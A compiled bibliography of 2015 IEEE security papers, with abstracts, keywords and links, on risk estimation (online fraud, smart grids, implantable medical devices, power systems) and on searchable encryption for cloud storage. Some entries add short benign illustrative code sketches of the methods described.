Keywords: risk management; telecommunication security; wireless sensor networks; WSN; heterogeneous wireless sensor network; risk assessment framework; security attack; sensor cloud; Bayes methods; Clouds; Degradation; Estimation; Risk management; Security; Wireless sensor networks (ID#: 16-9315)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7264369&isnumber=7264347

 

Gorton, D., "Modeling Fraud Prevention of Online Services Using Incident Response Trees and Value at Risk," in Availability, Reliability and Security (ARES), 2015 10th International Conference on, pp. 149-158, 24-27 Aug. 2015. doi: 10.1109/ARES.2015.17

Abstract: Authorities like the Federal Financial Institutions Examination Council in the US and the European Central Bank in Europe have stepped up their expected minimum security requirements for financial institutions, including the requirements for risk analysis. In a previous article, we introduced a visual tool and a systematic way to estimate the probability of a successful incident response process, which we called an incident response tree (IRT). In this article, we present several scenarios using the IRT which could be used in a risk analysis of online financial services concerning fraud prevention. By minimizing the problem of underreporting, we are able to calculate the conditional probabilities of prevention, detection, and response in the incident response process of a financial institution. We also introduce a quantitative model for estimating expected loss from fraud, and conditional fraud value at risk, which enables a direct comparison of risk among online banking channels in a multi-channel environment.

Keywords: Internet; computer crime; estimation theory; financial data processing; fraud; probability; risk analysis; trees (mathematics); IRT; conditional fraud value; cyber criminal; fraud prevention modelling; incident response tree; online financial service; probability estimation; risk analysis; Europe; Online banking; Probability; Trojan horses (ID#: 16-9316)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7299908&isnumber=7299862
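
The two quantities in the abstract, the success probability read off an incident response tree and a fraud value at risk, can be sketched as follows; the tree structure, stage probabilities, attempt rate, and loss distribution are all invented for illustration.

# Hedged sketch: loss probability from a simple incident response tree,
# then an annual value-at-risk quantile from simulated fraud losses.
import numpy as np

p_prevent, p_detect, p_respond = 0.6, 0.7, 0.8   # stage success probabilities
p_loss = (1 - p_prevent) * (1 - p_detect * p_respond)
print(f"P(attempt leads to loss) = {p_loss:.3f}")

rng = np.random.default_rng(2)
years = 10_000
annual = np.empty(years)
for y in range(years):
    n = rng.poisson(200)                          # fraud attempts this year
    hit = rng.random(n) < p_loss                  # attempts that cause loss
    annual[y] = rng.lognormal(8, 1, size=n)[hit].sum()
print(f"99% annual fraud value-at-risk ~ {np.quantile(annual, 0.99):,.0f}")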

 

Collins, K.; Goossens, B., "Cost Effective V&V for Guidance Systems using Enhanced Ground Testing (EGT)," in IEEE AUTOTESTCON, 2015, pp. 244-250, 2-5 Nov. 2015. doi: 10.1109/AUTEST.2015.7356497

Abstract: Strategic missile systems perform an important role in safeguarding our national security. These systems use inertial guidance systems to navigate and control the missile to its intended target. As military budgets shrink, maintaining schedule and cost for the development and sustainment of these complex systems is paramount. Early prototyping combined with ongoing requirements verification in the system development cycle is critical to reducing schedule and cost risks. Verification and validation programs must verify requirements and instill confidence that the system will perform as intended with minimal flight testing. The Enhanced Ground Testing (EGT) program was developed at Draper Laboratory to address these risks. EGT tests the guidance system in tactically representative environments as part of system verification and validation. Multiple test cells are used to simulate the missile environments the guidance system will encounter during flight; for the Navy MK6 MOD 1 EGT, these consist of an Aircraft F-15E Pod, a Centrifuge, and a Dynamic Shaker. The test cells support profiles for environmental thermal, vibration/shock, and linear acceleration, and provide test data for reliability and accuracy assessments. An EGT program provides design confidence, enables predictive methods for accuracy and reliability degradation, and is a cost-effective way to complement flight test programs.

Keywords: aircraft testing; military aircraft; missile guidance; national security; reliability; vibrations; Draper Laboratory; Navy MK6 MOD 1 EGT program; aircraft F-15E pod; cost effective V&V; cost risk reduction; dynamic shaker; enhanced ground testing; environmental thermal; flight test program; guidance system; inertial guidance system; linear acceleration; missile control; missile navigation; national security; reliability assessment; strategic missile system; verification and validation program; Cooling; Degradation; Life estimation; Missiles; Reliability; Testing; Timing; enhanced ground test; strategic guidance system; verification and validation (ID#: 16-9317)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7356497&isnumber=7356451

 

Carlini, E.M.; Pecoraro, G.; Tina, G.M.; Quaciari, C., "Risk-Based Probabilistic Approach to Estimate Power System Security in the Sicilian Context," in Clean Electrical Power (ICCEP), 2015 International Conference on, pp. 737-742, 16-18 June 2015. doi: 10.1109/ICCEP.2015.7177573

Abstract: The quality of the transmission service in Italy is managed by the TSO. Although the transmission network is meshed, faults often cause the disconnection of some users (distribution substations or HV customers). The Authority has issued well-defined guidelines that regulate the payments and premiums to which the TSO is subject. Outages may occur due to events affecting atypical network structures or areas normally fed in radial mode. To date, in Italy, there is no risk analysis based on probabilistic considerations drawn from historical data; this article presents a platform able to estimate such risk, taking into account the directives of the Authority. By consulting this platform when planning an unavailability, the TSO will be aware of the risk and can decide whether to take corrective and/or preventive actions to reduce it. The proposed study also forms the basis of a probabilistic assessment of the safety of the electrical system.

Keywords: electrical safety; power system management; power system security; power transmission faults; power transmission planning; power transmission reliability; risk analysis; Sicilian context; TSO; electrical system safety; power outage; power system security estimation; risk-based probabilistic approach; transmission network planning; transmission service quality; Gravity; Indexes; Probabilistic logic; Probability; Software; Springs (ID#: 16-9318)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7177573&isnumber=7177533

 

Ankarali, Z.E.; Demir, A.F.; Qaraqe, M.; Abbasi, Q.H.; Serpedin, E.; Arslan, H.; Gitlin, R.D., "Physical Layer Security for Wireless Implantable Medical Devices," in Computer Aided Modelling and Design of Communication Links and Networks (CAMAD), 2015 IEEE 20th International Workshop on, pp. 144-147, 7-9 Sept. 2015. doi: 10.1109/CAMAD.2015.7390497

Abstract: Wireless communications are increasingly important in health-care applications, particularly in those that use implantable medical devices (IMDs). Such systems have many advantages in providing remote healthcare in terms of monitoring, treatment and prediction for critical cases. However, the existence of malicious adversaries, referred to as nodes, which attempt to control implanted devices, constitutes a critical risk for patients. Such adversaries may perform dangerous attacks by sending malicious commands to the IMD, and any weakness in the device authentication mechanism may result in serious problems, including death. In this paper we present a physical layer (PHY) authentication technique for IMDs that does not use existing methods of cryptology. In addition to ensuring authentication, the proposed technique also provides advantages in terms of decreasing the processing complexity of IMDs and enhancing overall communications performance.

Keywords: biomedical communication; biomedical electronics; body area networks; cryptographic protocols; health care; prosthetics; PHY authentication technique; critical case monitoring; critical case prediction; critical case treatment; death; device authentication mechanism; health care applications; nodes; physical layer security; remote healthcare; wireless communications; wireless implantable medical devices; Authentication; Bit error rate; Channel estimation; Jamming; Performance evaluation; Wireless communication; Body area networks; implantable medical devices (IMDs); in-vivo wireless communications; security (ID#: 16-9319)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7390497&isnumber=7390465

 

Langer, L.; Smith, P.; Hutle, M., "Smart Grid Cybersecurity Risk Assessment," in Smart Electric Distribution Systems and Technologies (EDST), 2015 International Symposium on, pp. 475-482, 8-11 Sept. 2015. doi: 10.1109/SEDST.2015.7315255

Abstract: It is important that the smart grid be secured against cyber-attacks as far as possible. A vital part of ensuring the security of smart grids is to perform a cybersecurity risk assessment that methodically examines the impact and likelihood of cyber-attacks. Based on the outcomes of a risk assessment, security requirements and controls can be determined that inform architectural choices and address the identified risks. Numerous high-level risk assessment methods and frameworks are applicable in this context. A method that was developed specifically for smart grids is the Smart Grid Information Security (SGIS) toolbox, which we applied to a voltage control and power flow optimization smart grid use case. The outcomes of the assessment indicate that physical consequences could occur as a result of cyber-attacks on information assets. Additionally, we provide reflections on our experiences with the SGIS toolbox, in order to support others in the community when implementing their own risk assessment for the smart grid.

Keywords: control engineering computing; load flow control; power system analysis computing; power system security; risk management; security of data; smart power grids; voltage control; SGIS toolbox; architectural choices; cyber-attacks; information assets; power flow optimization; security requirements; smart grid cybersecurity risk assessment; smart grid information security toolbox; voltage control; Density estimation robust algorithm; Reactive power; Risk management; Security; Smart grids; Voltage control; Voltage measurement; SGIS toolbox; cybersecurity; risk assessment; smart grid (ID#: 16-9320)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7315255&isnumber=7315169

 

Jauhar, S.; Binbin Chen; Temple, W.G.; Xinshu Dong; Kalbarczyk, Z.; Sanders, W.H.; Nicol, D.M., "Model-Based Cybersecurity Assessment with NESCOR Smart Grid Failure Scenarios," in Dependable Computing (PRDC), 2015 IEEE 21st Pacific Rim International Symposium on, pp. 319-324, 18-20 Nov. 2015. doi: 10.1109/PRDC.2015.37

Abstract: The transformation of traditional power systems to smart grids brings significant benefits, but also exposes the grids to various cyber threats. The recent effort led by the US National Electric Sector Cybersecurity Organization Resource (NESCOR) Technical Working Group 1 to compile failure scenarios is an important initiative to document typical cybersecurity threats to smart grids. While these scenarios are an invaluable thought-aid, companies still face challenges in systematically and efficiently applying the failure scenarios to assess security risks for their specific infrastructure. In this work, we develop a model-based process for assessing the security risks from NESCOR failure scenarios. We extend our cybersecurity assessment tool, CyberSAGE, to support this process, and use it to analyze 25 failure scenarios. Our results show that CyberSAGE can generate precise and structured security argument graphs to quantitatively reason about the risk of each failure scenario. Further, CyberSAGE can significantly reduce the assessment effort by allowing the reuse of models across different failure scenarios, systems, and attacker profiles to perform "what if?" analysis.

Keywords: power system security; security of data; smart power grids; Cyber-SAGE; NESCOR smart grid failure scenarios; model-based cybersecurity assessment; model-based process; security argument graphs; security risks; Companies; Computer security; Density estimation robust algorithm; Risk management; Smart grids; Unified modeling language; NESCOR; Smart grid; cybersecurity (ID#: 16-9321)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371879&isnumber=7371833

 

Shchetinin, D.; Hug, G., "Risk-Constrained AC OPF with Risk Limits on Individual System States," in PowerTech, 2015 IEEE Eindhoven, pp. 1-6, June 29 2015-July 2 2015. doi: 10.1109/PTC.2015.7232330

Abstract: Risk-based security indexes can be used as a constraint in OPF to determine the most economic generation dispatch while ensuring that the risk of power system operation stays below a given value. Existing approaches only limit the total risk, which can result in some system states having significantly higher values of risk compared to others. In this paper, a risk-constrained AC OPF that limits the individual risk of each considered system state is proposed. The resulting optimization problem is solved by a centralized method and an iterative algorithm based on locational security impact factors, which quantify the impact of a change in a generator output on the risk of a certain system state. A comparison of these methods in terms of simulation time and solution accuracy, as well as an analysis of limiting the total versus the individual risk, is presented for the IEEE Reliability Test System.

Keywords: iterative methods; optimisation; power generation dispatch; power generation economics; power system security; power system state estimation; risk analysis; IEEE reliability test system; centralized method; economic generation dispatch; iterative algorithm; locational security impact factor; optimization problem; power system operation risk; power system state; risk constrained AC OPF; risk limit; risk-based security index; Generators; Indexes; Iterative methods; Niobium; Optimization; Power systems; Security; optimization; risk-based security (ID#: 16-9322)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7232330&isnumber=7232233
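The contrast at the heart of this paper can be made concrete with a generic formulation (our notation, not the paper's): prior approaches bound the aggregate risk, while the proposed method bounds each considered state separately.

    \min_{x}\; C(x) \quad \text{s.t.} \quad g(x) = 0,\;\; h(x) \le 0, \qquad
    \sum_{s} R_s(x) \le R^{\mathrm{tot}} \;\;\text{(total risk, prior work)}
    \quad \text{vs.} \quad
    R_s(x) \le R_s^{\max} \;\; \forall s \;\;\text{(per-state limits, this paper)}

Here C(x) is the generation cost, g and h are the AC power flow and operating constraints, and R_s is the risk of system state s.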

 

Badawy, A.; Khattab, T.; Elfouly, T.; Chiasserini, C.-F.; Mohamed, A.; Trinchero, D., "Channel Secondary Random Process for Robust Secret Key Generation," in Wireless Communications and Mobile Computing Conference (IWCMC), 2015 International, pp. 114-119, 24-28 Aug. 2015. doi: 10.1109/IWCMC.2015.7289067

Abstract: The broadcast nature of wireless communications imposes the risk of information leakage to adversarial users or unauthorized receivers. Therefore, information security between intended users remains a challenging issue. Most current physical layer security techniques exploit channel randomness as a common source between two legitimate nodes to extract a secret key. In this paper, we propose a new simple technique to generate the secret key. Specifically, we exploit the estimated channel to generate a secondary random process (SRP) that is common between the two legitimate nodes. We compare the estimated channel gain and phase to a preset threshold. The moving differences between the locations at which the estimated channel gain and phase exceed the threshold are the realization of our SRP. We simulate an orthogonal frequency division multiplexing (OFDM) system and show that our proposed technique provides a drastic improvement in the key bit mismatch rate (BMR) between the legitimate nodes when compared to techniques that exploit the estimated channel gain or phase directly. In addition, the secret key generated through our technique is longer than that generated by conventional techniques.

Keywords: OFDM modulation; channel estimation; phase estimation; private key cryptography; radio receivers; random processes; risk analysis; BMR; OFDM; SRP; adversarial user; channel gain estimation; channel randomness; channel secondary random process; information leakage risk; information security; key bit mismatch rate; legitimate node; orthogonal frequency division multiplexing; phase estimation; physical layer security technique; robust secret key generation; unauthorized receiver; wireless communication; Channel estimation; Entropy; Gain; OFDM; Quantization (signal); Random processes; Signal to noise ratio; Bit mismatch rate; Channel estimation; OFDM systems; Physical layer security; Secret key generation (ID#: 16-9323)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7289067&isnumber=7288920
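The threshold-crossing idea above is easy to sketch. The following Python fragment derives key bits from the spacings between locations where the estimated channel gain exceeds the threshold; the parity-based quantizer is our illustrative assumption, since the abstract does not specify how the spacings are mapped to bits.

    import numpy as np

    def srp_key_bits(gain_estimates, threshold, n_bits=128):
        # gain_estimates: numpy array of estimated channel gains
        # Locations where the estimated gain exceeds the preset threshold
        crossings = np.flatnonzero(gain_estimates > threshold)
        # Moving differences between successive crossing locations
        # are the realization of the secondary random process (SRP)
        srp = np.diff(crossings)
        # Toy quantizer (assumption): parity of each spacing gives one bit
        return (srp % 2)[:n_bits]

Both legitimate nodes would run the same procedure on their own channel estimates; channel reciprocity makes the crossing locations, and hence the spacings, largely agree.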

 

Razzaque, M.A.; Clarke, S., "A Security-Aware Safety Management Framework for IoT-Integrated Bikes," in Internet of Things (WF-IoT), 2015 IEEE 2nd World Forum on, pp. 92-97, 14-16 Dec. 2015. doi: 10.1109/WF-IoT.2015.7389033

Abstract: Bike and vehicle collisions often result in fatality to vulnerable bikers. Use of technologies can protect such vulnerable road users. Next generation smart bikes with sensing, computing and communication capabilities, or bikes paired with bikers' smartphones, have the potential to be integrated in an Internet of Things (IoT) environment. Unlike the avoidance of inter-vehicle collisions, very limited effort has been made on IoT-integrated bikes and vehicles to avoid bike-vehicle collisions and ensure bikers' safety. Moreover, these IoT-integrated bikes and vehicles will create new and different information and cyber security risks that could make existing safety solutions ineffective. To exploit the potential of IoT in an effective way, especially for bikers' safety, this work proposes a security-aware bikers' safety management framework that integrates a misbehavior detection scheme (MDS) and a collision prediction and detection scheme (CPD). The MDS, in particular for vehicles (as vehicles are mainly responsible for most bike-vehicle collisions), provides security-awareness to the framework using in-vehicle security checking and vehicles' mobility-patterns-based misbehavior detection. The MDS also includes in-vehicle driver behavior monitoring to identify potentially misbehaving drivers. The framework's MDS and CPD rely on improved versions of some existing solutions. Use cases of the framework demonstrate its potential in providing biker safety.

Keywords: Internet of Things; bicycles; mobility management (mobile radio); road safety; smart phones; telecommunication security; CPD scheme; Internet of Things environment; IoT environment; IoT-integrated bikes; MDS; behavior monitoring; bike collisions; bike-vehicle collisions; collision prediction and detection scheme; cyber security risks; in-vehicle security checking; information risks; mobility-patterns-based misbehavior detection; next generation smart bikes; security-aware bikers safety management framework; security-awareness; smartphones; vulnerable road users; Cloud computing; Estimation; Roads; Security; Trajectory; Vehicles; Bikers' Safety; Bikes; Collision Prediction and Detection; Security; V2X communication (ID#: 16-9324)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7389033&isnumber=7389012


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Searchable Encryption 2015

 

 
SoS Logo

Searchable Encryption 2015

 

Searchable encryption allows one to store encrypted data externally while still supporting efficient searches: the searcher does not have to download and decrypt everything, and others can be allowed to search the data without having access to the plaintext. As an application, it is becoming increasingly important in the Cloud environment. For the Science of Security community, it is an area of research related to cryptography, resilience, and composability. Research cited here was presented in 2015.
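The core mechanism is easy to illustrate. In the simplest symmetric designs, each keyword is replaced by a pseudorandom token, so the server can match queries against an index without ever seeing the words. A minimal Python sketch follows (illustrative only, and deliberately simplified: deployed schemes also encrypt the postings lists and take care to limit search- and access-pattern leakage):

    import hmac, hashlib
    from collections import defaultdict

    def token(key: bytes, keyword: str) -> bytes:
        # Pseudorandom function of the keyword under the client's secret key
        return hmac.new(key, keyword.encode(), hashlib.sha256).digest()

    def build_index(key: bytes, docs: dict) -> dict:
        # Server-side index: keyword token -> list of document identifiers
        index = defaultdict(list)
        for doc_id, words in docs.items():
            for w in set(words):
                index[token(key, w)].append(doc_id)
        return dict(index)

    def search(index: dict, key: bytes, keyword: str) -> list:
        # The server matches on the token and never learns the keyword
        return index.get(token(key, keyword), [])

For example, with docs = {"d1": ["cloud", "security"], "d2": ["cloud"]}, a query for "cloud" returns ["d1", "d2"] while the stored index contains only opaque 32-byte tokens.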


Mingchu Li; Wei Jia; Cheng Guo; Weifeng Sun; Xing Tan, "LPSSE: Lightweight Phrase Search with Symmetric Searchable Encryption in Cloud Storage," in Information Technology - New Generations (ITNG), 2015 12th International Conference on, pp. 174-178, 13-15 April 2015. doi: 10.1109/ITNG.2015.33

Abstract: The security of cloud storage has drawn more and more concern. In searchable encryption, many previous solutions let people retrieve documents containing a single keyword or conjunctive keywords by storing encrypted documents with data indexes. However, searching documents with a phrase or consecutive keywords remains an open problem. In this paper, using relative positions, we propose an efficient scheme, LPSSE, with symmetric searchable encryption that can support encrypted phrase searches in cloud storage. Our scheme is based on the non-adaptive security definition of R. Curtmola and has lower transmission and storage costs than existing systems. Furthermore, we combine components of current efficient search engines with our functions to complete a prototype. The experimental results also show that our scheme LPSSE is practical and efficient.

Keywords: cloud computing; cryptography; storage management; LPSSE scheme; cloud storage security; data indexes; document retrieval; encrypted document storage; lightweight phrase search with symmetric searchable encryption; nonadaptive security; search engines; Arrays; Cloud computing; Encryption; Indexes; Servers; Cloud storage; Lightweight searchable encryption scheme; Phrase search; Searchable encryption; Symmetry (ID#: 16-9131)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7113468&isnumber=7113432
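The relative-position idea behind LPSSE has a simple plaintext analogue: store each keyword's occurrence positions alongside its postings, then check that consecutive phrase words occur at consecutive offsets. A sketch of that analogue follows (over plaintext; LPSSE performs the corresponding check on encrypted postings):

    from collections import defaultdict

    def build_positional_index(docs):
        # keyword -> doc_id -> list of positions where the keyword occurs
        index = defaultdict(lambda: defaultdict(list))
        for doc_id, words in docs.items():
            for pos, w in enumerate(words):
                index[w][doc_id].append(pos)
        return index

    def phrase_search(index, phrase):
        words = phrase.split()
        hits = []
        for doc_id, positions in index.get(words[0], {}).items():
            # A match requires every later word at the expected offset
            for p in positions:
                if all(p + i in index.get(w, {}).get(doc_id, [])
                       for i, w in enumerate(words[1:], start=1)):
                    hits.append(doc_id)
                    break
        return hits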

 

Jun Yang; Chuan Fu; Nan Shen; Zheli Liu; Chunfu Jia; Jin Li, "General Multi-key Searchable Encryption," in Advanced Information Networking and Applications Workshops (WAINA), 2015 IEEE 29th International Conference on, pp. 89-95, 24-27 March 2015. doi: 10.1109/WAINA.2015.18

Abstract: We analyze an outsourced server with multiple users and classify data sharing into two main types. We focus on data sharing between users in Searchable Encryption and the corresponding security goal. We then present a general scheme for Searchable Encryption in which the ciphertext can be generated from a parameter by authorized users. Using the concepts of homomorphism and one-way functions, we construct a general model to illustrate and fulfill the goals involved. We also extend this model to a general Multi-Key Searchable Encryption which enables retrieval from documents encrypted under different keys with only a single query submission. We give two concrete examples to illustrate the feasibility and security of such a general model.

Keywords: cryptography; file servers; information retrieval; outsourcing; security of data; authorized users; ciphertext; data sharing classification; document encryption; multikey searchable encryption; one-way function; outsourced server analysis; Access control; Concrete; Data models; Encryption; Servers; Homomorphism; Multi-key; Searchable Encryption (ID#: 16-9132)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7096153&isnumber=7096097

 

Emura, K.; Le Trieu Phong; Watanabe, Y., "Keyword Revocable Searchable Encryption with Trapdoor Exposure Resistance and Re-generateability," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 167-174, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.371

Abstract: In searchable encryption in the public-key setting, a trapdoor is uploaded to a server, and the server runs the test algorithm using the trapdoor. However, if trapdoors stored on the server are exposed due to unexpected situations, then anyone can run the test algorithm. Therefore, trapdoor revocation functionality is desirable in practice. Moreover, even when keyword revocation functionality is supported, the impact of trapdoor exposure should be minimized. In addition, it seems difficult to assume that revoked keywords will never be used again; we therefore need to consider the case where a new trapdoor can be generated even if a trapdoor has been revoked before. In this paper, we give a formal definition of keyword revocable public key encryption with keyword search (KR-PEKS), and propose a generic construction of KR-PEKS from revocable identity-based encryption with a certain anonymity. Our construction is not only a generalization of the revocable keyword search proposed by Yu, Ni, Yang, Mu, and Susilo (Security and Communication Networks 2014), but also supports trapdoor exposure resistance, which guarantees that exposure of one trapdoor does not affect other trapdoors, and trapdoor re-generateability, which guarantees that a new trapdoor can be generated even if a keyword has been revoked before.

Keywords: public key cryptography; KR-PEKS; generic construction; keyword revocable public key encryption-with-keyword search; keyword revocable searchable encryption; regenerateability; revocable identity-based encryption; trapdoor exposure resistance; keyword revocation; revocable identity-based encryption; searchable encryption (ID#: 16-9133)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345279&isnumber=7345233

 

Bing Wang; Wei Song; Wenjing Lou; Hou, Y.T., "Inverted Index Based Multi-Keyword Public-Key Searchable Encryption with Strong Privacy Guarantee," in Computer Communications (INFOCOM), 2015 IEEE Conference on, pp. 2092-2100, April 26 2015-May 1 2015. doi: 10.1109/INFOCOM.2015.7218594

Abstract: With the growing awareness of data privacy, more and more cloud users choose to encrypt their sensitive data before outsourcing them to the cloud. Search over encrypted data is therefore a critical function facilitating efficient cloud data access, given the high data volume that each user has to handle nowadays. The inverted index is one of the most efficient searchable index structures and has been widely adopted in plaintext search. However, securing an inverted index and its associated search schemes is not a trivial task. A major challenge exposed by the existing efforts is the difficulty of protecting the user's query privacy. The challenge is rooted in two facts: 1) the existing solutions use a deterministic trapdoor generation function for queries; and 2) once a keyword is searched, the encrypted inverted list for this keyword is revealed to the cloud server. We denote this second property of the existing solutions as the one-time-only search limitation. Additionally, conjunctive multi-keyword search, which is the most common form of query nowadays, is not supported in those works. In this paper, we propose a public-key searchable encryption scheme based on the inverted index. Our scheme preserves the high search efficiency inherited from the inverted index while lifting the one-time-only search limitation of the previous solutions. Our scheme features a probabilistic trapdoor generation algorithm and protects the search pattern. In addition, our scheme supports conjunctive multi-keyword search. Compared with the existing public key based schemes that heavily rely on expensive pairing operations, our scheme is more efficient, using only multiplications and exponentiations. To meet stronger security requirements, we strengthen our scheme with an efficient oblivious transfer protocol that hides the access pattern from the cloud. The simulation results demonstrate that our scheme is suitable for practical usage with moderate overhead.

Keywords: cloud computing; data privacy; public key cryptography; cloud computing; cloud data access; cloud server; cloud users; conjunctive multikeyword search; data privacy; data volume; inverted index; multikeyword public key searchable encryption; plaintext search; probabilistic trapdoor generation algorithm; public key searchable encryption scheme; search pattern; searchable index structures; sensitive data; trapdoor generation function; user query privacy; Encryption; Indexes; Polynomials; Privacy; Public key; Servers (ID#: 16-9134)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7218594&isnumber=7218353

 

Syh-Yuan Tan; Ji-Jian Chin; Geong-Sen Poh; Kam, Y.H.S.; Wei-Chuen Yau, "A Client-Server Prototype of a Symmetric Key Searchable Encryption Scheme Using Open-Source Applications," in IT Convergence and Security (ICITCS), 2015 5th International Conference on, pp. 1-5, 24-27 Aug. 2015. doi: 10.1109/ICITCS.2015.7292892

Abstract: Searchable encryption is a cryptographic primitive that allows a user to confidentially store items on an outside server and grants the user the capability to search for any particular stored item without the server or any third-party observers learning anything about the item being searched for. In 2006, Curtmola et al. strengthened the security notions for symmetric-key searchable encryption (SSE) and proposed two secure constructions that utilize only a conventional symmetric-key encryption scheme such as the Advanced Encryption Standard (AES). In this work, we show a client-server prototype implementation of the adaptive-secure scheme by Curtmola et al. utilizing only open source software on both the client and server side. We show that our implementation runs in reasonable time and provides confidential search functions as defined by SSE schemes.

Keywords: client-server systems; cryptography; data privacy; public domain software; AES; Advanced Encryption Standard; adaptive-secure scheme; client-server prototype; confidential item storage; confidential search function; cryptography; open source software; open-source applications; security; symmetric key searchable encryption scheme; Encryption; Indexes; Prototypes; Servers (ID#: 16-9135)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292892&isnumber=7292885

 

Wenjun Luo; Yaqiong Chen; Yousheng Zhou, "Dynamic Searchable Encryption with Multi-user Private Search for Cloud Computing," in Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, pp. 176-182, 26-28 Oct. 2015. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.359

Abstract: Dynamic searchable encryption enables data owner to store a dynamic collection of encrypted files to the cloud server and generate search tokens of queries over the cloud server. Upon receiving a token, the server can perform the search on the encrypted data while preserving privacy. Unlike many previous works that focused on a single-user scheme, we present a dynamic searchable encryption scheme with multi-user private search for cloud computing. We consider the use scenario of cloud storage services where an organization outsources its data to the cloud and authorizes a group of users to access the data. Our scheme is dependent on a red-black data structure which is highly parallelizable and dynamic, and its security is proven in the random oracle model.

Keywords: cloud computing; cryptography; data privacy; data structures; cloud computing; cloud server; cloud storage services; data owner; dynamic searchable encryption scheme; encrypted files; multiuser private search; privacy preservation; random oracle model; red-black data structure; search tokens; Cloud computing; Encryption; Indexes; Privacy; Servers; Secure cloud storage; privacy; multi-user setting  (ID#: 16-9136)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363068&isnumber=7362962

 

Koschuch, M.; Hombauer, M.; Schefer-Wenzl, S.; Habock, U.; Hrdlicka, S., "Fogging The Cloud — Implementing and Evaluating Searchable Encryption Schemes in Practice," in Integrated Network Management (IM), 2015 IFIP/IEEE International Symposium on, pp. 1365-1368, 11-15 May 2015. doi: 10.1109/INM.2015.7140497

Abstract: With the rise of cloud computing, new ways to secure outsourced data have to be devised. Traditional approaches, like simply encrypting all data before it is transferred, only partially alleviate this problem. Searchable Encryption (SE) schemes enable the cloud provider to search for user-supplied strings in the encrypted documents, while learning nothing about the content of the documents or the search terms. Currently there are many different SE schemes defined in the literature, with their number steadily growing. But experimental results on real-world performance, and direct comparisons between different schemes, are severely lacking. In this work we propose a simple Java client-server framework to efficiently implement different SE algorithms and compare their efficiency in practice. In addition, we demonstrate the possibilities of such a framework by implementing two existing SE schemes from slightly different domains and comparing their behavior in a real-world setting.

Keywords: Java; cloud computing; cryptography; document handling; Java client-server framework; SE schemes; cloud computing; encrypted documents; outsourced data security; searchable encryption schemes; user supplied strings; Arrays; Conferences; Encryption; Indexes; Servers (ID#: 16-9137)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7140497&isnumber=7140257

 

Mallaiah, Kurra; Ramachandram, S; Gandhi, Rishi Kumar, "Multi User Searchable Encryption Schemes Using Trusted Proxy for Cloud Based Relational Databases," in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, pp. 1554-1559, 8-10 Oct. 2015. doi: 10.1109/ICGCIoT.2015.7380714

Abstract: Use of cloud Database-as-a-Service (DaaS) is gradually increasing in private and government organizations. Organizations are now considering outsourcing their local databases to cloud database servers to minimize operational and maintenance expenses. At the same time, users are apprehensive about confidentiality breaches of their vital data in the cloud database. To achieve complete confidentiality of such data in outsourced databases, the data must be kept in always-encrypted form throughout its entire life cycle, i.e., at rest, in transit, and while in operation on the premises of the cloud database service. Searchable encryption is a scheme which allows users to perform an encrypted keyword search on encrypted data stored in a database server directly, without decrypting it. Many applications require database access by multiple users, where data is written by different users using different encryption keys. In this paper, we propose schemes for Multi-user multi-key Encryption Search for cloud Relational Databases (MES-RD). They support search operations on data encrypted under different keys by multiple users using a Trusted Proxy. These data may be stored in a shared table under one or another column of the database server. To the best of our knowledge, the proposed MES-RD schemes are practical and the first proposed for databases.

Keywords: Computer hacking; Databases; Encryption; Levee; Organizations; Servers; Cloud computing; Database security; Multikey Encryption Search (ID#: 16-9138)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380714&isnumber=7380415

 

Xu, Lei; Xu, Chungen, "Efficient and Secure Data Retrieval Scheme Using Searchable Encryption in Cloud Storage," in Security and Privacy in Social Networks and Big Data (SocialSec), 2015 International Symposium on, pp. 15-21, 16-18 Nov. 2015. doi: 10.1109/SocialSec2015.16

Abstract: In the new era of data explosion, the problems of data storage and portability have been solved with the advent of cloud technologies. But the attendant problem is that most of the data stored by users are uploaded in the form of plaintext; this means that the more data and information a user uploads to the cloud, the greater the privacy and information security risks. This paper presents a data retrieval system using a public key encryption system with keyword search, in which the client can test whether or not a file stored on the cloud server contains the keyword without leaking information about the encrypted file. We apply asymmetric pairings to achieve a shorter key size in the standard model, and adopt the dual system encryption technique to reduce the scheme's security to the hardness of the Symmetric External Diffie-Hellman assumption. At the end of the paper, we analyze the scheme's efficiency and point out that our scheme is more efficient and secure than some other classical data retrieval models.

Keywords: Big data; Data privacy; Security; Social network services; asymmetric pairings; data retrieval; dual system encryption; keyword search encryption (ID#: 16-9139)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371894&isnumber=7371823

 

